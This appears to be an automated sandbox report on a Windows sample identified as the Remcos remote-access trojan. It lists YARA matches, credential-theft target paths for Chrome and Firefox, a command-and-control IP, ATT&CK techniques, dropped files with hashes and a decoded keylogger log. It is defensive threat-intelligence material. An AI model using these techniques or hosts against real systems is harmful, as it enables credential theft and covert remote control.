Source: Yara match | File source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 4896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 17_2_0040BA12
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 17_2_0040BB30
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: \key3.db | 17_2_0040BB30

                  Remote Access Functionality

Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HKC0PV
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HKC0PV
Source: Yara match | File source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 4896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: cmd.exe | 17_2_0040569A
MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the hit badge shown in the matrix cell):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Native API; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 1 Windows Service; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 122 Process Injection; 1 Scheduled Task/Job; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 122 Process Injection
Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 33 System Information Discovery; 121 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 211 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 12 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (Graph ID: 1465543; Sample: HUED23EDE5UGRFQ.exe; Start date: 01/07/2024; Architecture: WINDOWS; Score: 100). The graph image is not reproduced here; the nodes and edges it showed:

• Top level: DNS resolution of geoplugin.net; signatures: Snort IDS alert for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 13 other signatures. Started processes: jdSldfVS.exe and HUED23EDE5UGRFQ.exe.
• HUED23EDE5UGRFQ.exe: dropped C:\Users\user\AppData\Roaming\jdSldfVS.exe (PE32), C:\Users\...\jdSldfVS.exe:Zone.Identifier (ASCII), C:\Users\user\AppData\Local\...\tmpAF95.tmp (XML), C:\Users\...\HUED23EDE5UGRFQ.exe.log (ASCII); signatures: Uses schtasks.exe or at.exe to add and modify task schedules, Adds a directory exclusion to Windows Defender; started a second HUED23EDE5UGRFQ.exe instance, two powershell.exe instances and schtasks.exe.
• Second HUED23EDE5UGRFQ.exe instance: contacted 94.156.69.93 (ports 2973, 49712; TERASYST-ASBG, Bulgaria) and geoplugin.net 178.237.33.50 (ports 49715, 80; ATOM86-ASATOM86NL, Netherlands); dropped C:\ProgramData\remcos\logs.dat (data); signatures: Detected Remcos RAT, Installs a global keyboard hook.
• jdSldfVS.exe: signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Contains functionality to bypass UAC (CMSTPLUA), 7 other signatures; started three further jdSldfVS.exe instances and schtasks.exe (which started conhost.exe).
• powershell.exe (first instance): signature: Loading BitLocker PowerShell Module; started WmiPrvSE.exe and conhost.exe. The second powershell.exe instance and the schtasks.exe started by HUED23EDE5UGRFQ.exe each started conhost.exe.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample (Source | Detection | Scanner | Label):
HUED23EDE5UGRFQ.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.XWorm
HUED23EDE5UGRFQ.exe | 100% | Avira | HEUR/AGEN.1308776
HUED23EDE5UGRFQ.exe | 100% | Joe Sandbox ML |

Dropped Files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\jdSldfVS.exe | 100% | Avira | HEUR/AGEN.1308776
C:\Users\user\AppData\Roaming\jdSldfVS.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\jdSldfVS.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.XWorm

No Antivirus matches
No Antivirus matches

URLs (Source | Detection | Scanner | Label):
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://geoplugin.net/json.gpiiB | 0% | Avira URL Cloud | safe
94.156.69.93 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpl | 0% | Avira URL Cloud | safe

Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
geoplugin.net | 178.237.33.50 | true | false | | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
94.156.69.93 | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://geoplugin.net/json.gp/C | HUED23EDE5UGRFQ.exe, 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpl | HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | HUED23EDE5UGRFQ.exe, 00000000.00000002.2168229174.0000000002491000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 0000000A.00000002.2206237212.0000000003211000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpiiB | HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
94.156.69.93 | unknown | Bulgaria | 31420 | TERASYST-ASBG | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1465543
                    Start date and time:2024-07-01 19:41:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 22s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:HUED23EDE5UGRFQ.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.expl.evad.winEXE@23/17@1/2
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 171
                    • Number of non-executed functions: 220
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target HUED23EDE5UGRFQ.exe, PID 4896 because there are no executed function
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: HUED23EDE5UGRFQ.exe
Time     | Type            | Description
13:41:56 | API Interceptor | 7614019x Sleep call for process: HUED23EDE5UGRFQ.exe modified
13:41:58 | API Interceptor | 33x Sleep call for process: powershell.exe modified
13:42:01 | API Interceptor | 1x Sleep call for process: jdSldfVS.exe modified
19:41:58 | Task Scheduler  | Run new task: jdSldfVS path: C:\Users\user\AppData\Roaming\jdSldfVS.exe
Match         | Associated Sample Name / URL                                                 | Detection | Threat Name        | Context
94.156.69.93  | UHUH45EDRFQ.exe                                                              | malicious | Remcos             |
178.237.33.50 | DHL Shipping Document Awb & BL.vbs                                           | malicious | GuLoader, Remcos   | geoplugin.net/json.gp
178.237.33.50 | tWitaq427K.exe                                                               | malicious | Remcos, AgentTesla | geoplugin.net/json.gp
178.237.33.50 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs                         | malicious | GuLoader, Remcos   | geoplugin.net/json.gp
178.237.33.50 | Offer ZI-0428.doc                                                            | malicious | Remcos             | geoplugin.net/json.gp
178.237.33.50 | cKiTq7RRCn.exe                                                               | malicious | Remcos             | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#809676-JULY1.xla.xlsx                                                | malicious | Remcos             | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#809676-JULY1.xla.xlsx                                                | malicious | Remcos             | geoplugin.net/json.gp
178.237.33.50 | Quotation.xls                                                                | malicious | Remcos             | geoplugin.net/json.gp
178.237.33.50 | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs  | malicious | GuLoader, Remcos   | geoplugin.net/json.gp
178.237.33.50 | Maersk_BL_Invoice_Packinglist.vbs                                            | malicious | GuLoader, Remcos   | geoplugin.net/json.gp
Match         | Associated Sample Name / URL                                                 | Detection | Threat Name        | Context
geoplugin.net | DHL Shipping Document Awb & BL.vbs                                           | malicious | GuLoader, Remcos   | 178.237.33.50
geoplugin.net | tWitaq427K.exe                                                               | malicious | Remcos, AgentTesla | 178.237.33.50
geoplugin.net | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs                         | malicious | GuLoader, Remcos   | 178.237.33.50
geoplugin.net | Offer ZI-0428.doc                                                            | malicious | Remcos             | 178.237.33.50
geoplugin.net | cKiTq7RRCn.exe                                                               | malicious | Remcos             | 178.237.33.50
geoplugin.net | INQUIRY#809676-JULY1.xla.xlsx                                                | malicious | Remcos             | 178.237.33.50
geoplugin.net | INQUIRY#809676-JULY1.xla.xlsx                                                | malicious | Remcos             | 178.237.33.50
geoplugin.net | Quotation.xls                                                                | malicious | Remcos             | 178.237.33.50
geoplugin.net | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs  | malicious | GuLoader, Remcos   | 178.237.33.50
geoplugin.net | Maersk_BL_Invoice_Packinglist.vbs                                            | malicious | GuLoader, Remcos   | 178.237.33.50
Match             | Associated Sample Name / URL                                                                 | Detection | Threat Name                  | Context
TERASYST-ASBG     | s1C1DWgj73.elf                                                                               | malicious | Mirai                        | 94.156.67.161
TERASYST-ASBG     | ScjfNQG5l0.elf                                                                               | malicious | Unknown                      | 94.156.67.161
TERASYST-ASBG     | Jieok44uQ5.elf                                                                               | malicious | Mirai                        | 94.156.67.161
TERASYST-ASBG     | 94.156.67.161-mips-2024-07-01T10_28_03.elf                                                   | malicious | Mirai                        | 94.156.67.161
TERASYST-ASBG     | 94.156.67.161-arm-2024-07-01T10_28_03.elf                                                    | malicious | Unknown                      | 94.156.67.161
TERASYST-ASBG     | UHUH45EDRFQ.exe                                                                              | malicious | Remcos                       | 94.156.69.93
TERASYST-ASBG     | 0GrL5SShus.exe                                                                               | malicious | XWorm                        | 94.156.68.110
TERASYST-ASBG     | 9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe                                            | malicious | Mars Stealer, Stealc, Vidar  | 94.156.68.153
TERASYST-ASBG     | 9mgWSJhsD0.rtf                                                                               | malicious | Remcos                       | 94.156.68.221
TERASYST-ASBG     | 1719515826e3bb9af6f04480ac892d4c6a17ba1a711cc73b126620af7dbb5bfec4a271373f775.dat-decoded.exe | malicious | Remcos                       | 94.156.68.221
ATOM86-ASATOM86NL | DHL Shipping Document Awb & BL.vbs                                                           | malicious | GuLoader, Remcos             | 178.237.33.50
ATOM86-ASATOM86NL | tWitaq427K.exe                                                                               | malicious | Remcos, AgentTesla           | 178.237.33.50
ATOM86-ASATOM86NL | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs                                         | malicious | GuLoader, Remcos             | 178.237.33.50
ATOM86-ASATOM86NL | Offer ZI-0428.doc                                                                            | malicious | Remcos                       | 178.237.33.50
ATOM86-ASATOM86NL | cKiTq7RRCn.exe                                                                               | malicious | Remcos                       | 178.237.33.50
ATOM86-ASATOM86NL | INQUIRY#809676-JULY1.xla.xlsx                                                                | malicious | Remcos                       | 178.237.33.50
ATOM86-ASATOM86NL | INQUIRY#809676-JULY1.xla.xlsx                                                                | malicious | Remcos                       | 178.237.33.50
ATOM86-ASATOM86NL | Quotation.xls                                                                                | malicious | Remcos                       | 178.237.33.50
ATOM86-ASATOM86NL | awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs                  | malicious | GuLoader, Remcos             | 178.237.33.50
ATOM86-ASATOM86NL | Maersk_BL_Invoice_Packinglist.vbs                                                            | malicious | GuLoader, Remcos             | 178.237.33.50
                      No context
                      No context
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):224
                      Entropy (8bit):3.4354190470227914
                      Encrypted:false
                      SSDEEP:3:rhlKlVmNlN3Yb5JWRal2Jl+7R0DAlBG45klovDl65lQWluEkiEW/ufWPlgMlRQln:6lVMPYb5YcIeeDAlOWA7DxbN2fBMMm0v
                      MD5:4CF845C6F4D24FFDB8AE19EB917DCAE7
                      SHA1:14A1E843A9B5DF883CC6D0F74341DDDE22EC5C7A
                      SHA-256:C4D52FDB08880FDA02E3A4F182935D08F3AE7A129CAED0D826C5CA8FDFAA4B79
                      SHA-512:4F2DFE1EA57F5E7D529E94DC24C1B8302DBCA1222C7B3DC07EDAE3A43C19ECABB6409BC174B7DCEC72490969E0B814F283E154E6EEE54F3FC92660FD41B4FF38
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                      Reputation:low
Preview:....[.2.0.2.4./.0.7./.0.1. .1.3.:.4.1.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....
Decoded (the file is UTF-16LE; the report renders every non-printable byte as "."): [2024/07/01 13:41:58 Offline Keylogger Started] / [Program Manager] / { User has been idle for 0 minutes }. This is the Remcos offline keylogger log: a session header with a timestamp, the captured foreground window title, and an idle-time marker.
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):962
                      Entropy (8bit):5.012309356796613
                      Encrypted:false
                      SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                      MD5:14B479958E659C5A4480548A393022AC
                      SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                      SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                      SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                      Malicious:false
                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2232
                      Entropy (8bit):5.380192968514367
                      Encrypted:false
                      SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
                      MD5:E3EC01FAB7E327602A9550342FA73464
                      SHA1:7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
                      SHA-256:4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
                      SHA-512:B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1595
                      Entropy (8bit):5.09524540039865
